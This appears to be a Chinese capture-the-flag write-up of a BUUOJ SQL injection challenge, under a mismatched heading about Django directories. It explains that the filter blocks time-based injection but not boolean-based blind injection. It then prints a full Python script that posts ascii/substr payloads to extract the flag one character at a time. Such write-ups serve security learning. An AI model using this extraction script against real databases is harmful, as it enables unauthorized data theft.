django框架之目錄介紹等相關內容-60
阿新 • • 發佈:2020-11-21
-
知識點
基於布林型盲注
編寫python指令碼能力 -
審題
很簡潔的一個post提交sql注入題 測試了一下 過濾了一大堆 嘗試了基於時間的布林盲注 被過濾 然後嘗試了一下基於布林型的盲注 成功
然後就是很簡單的編寫指令碼 算是個簡單題
這個就是成功回顯頁面 可以看到和輸入id=1回顯一樣 下面貼出指令碼
import requests url = 'http://3c029064-6b6f-4efb-b2e0-ebb2495ed95a.node3.buuoj.cn/index.php' result = '' num = 0 for i in range (1,60): if (num == 1): break; for j in range (32,128): payload = 'if(ascii(substr((select(flag)from(flag)),%d,1))=%d,1,2)'%(i,j) print(payload) data = { 'id' : payload, } r = requests.post(url , data = data) if '}' in r.text: num = 1 print(result ) break if 'Hello' in r.text: x = chr(j) result += str(x) print(result) break
EOF